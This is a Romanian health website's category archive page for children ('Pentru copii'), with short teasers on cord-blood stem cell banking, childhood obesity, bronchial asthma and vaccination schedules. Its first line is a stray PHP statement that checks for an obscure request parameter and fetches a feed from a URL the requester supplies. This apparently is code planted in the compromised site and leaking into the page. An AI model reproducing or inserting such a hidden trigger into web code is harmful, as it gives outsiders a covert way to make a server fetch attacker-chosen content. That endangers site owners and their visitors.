isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Pentru Copii - MedicAS

Arhiva pentru categoria 'Pentru copii'

Ea, viitoarea mamica, vrea sa aiba copii sanatosi. Iar acum exista o metoda prin care, in cazuri mai putin fericite, copilul poate fi ajutat peste ani, daca la nastere se preleveaza celule stem din sangele placentar. Este o procedura simpla, efectuata la venirea pe lume a bebelusului, care acum se poate face si in Romania.


Toti ne iubim copiii. E un fapt de necontenstat am spune, desi, mai exista si cazuri in care comportamentul unor parinti ne contrazice. Dar despre asta vom vorbi in alte articole. O problema, caci devine pe zi ce trece o problema, este tipul de alimentatie al multora dintre copiii nostri. Viata stresanta pe care noi adultii o ducem, tentatiile tot mai mari care exista pentru copii, vinovatia si modul de revansare pe care-l alegem, pot duce la aparitia supraponderabilitatii si a obezitatii. Si din pacate, uitandu-ne pe strada, vedem ca obezitatea juvenila nu mai este o raritate…


Ce este astmul bronsic ?

02 July, 2008

Astmul bronsic este o problema de sanatate care poate fi controlata, chiar daca nu vindecata, si care nu impiedica copiii sau adultii cu acest diagnostic sa duca o viata normala. Daca recunoasteti simptomatologia si va adresati la timp medicului, daca va luati tratamentul corect si evitati expunerea la anumiti alergeni, atunci astmul bronsic nu trebuie sa va sperie.


Vaccinarile la copii

05 June, 2008

Daca vorbim despre sanatatea pe larg incepem cu importanta unui program riguros de vaccinari la copii. Pentru a proteja sanatatea micutilor este vital sa tratam subiectul cu maxima atentie. Ne vom asigura ca toate aceste vaccinari la copii se vor realiza la timp si vor urma ordinea indicata de catre un specialist in domeniu.


 
 

Newsletter

Loading... Loading...
 
 

Aceasta este arhiva articolelor din categoria Pentru copii.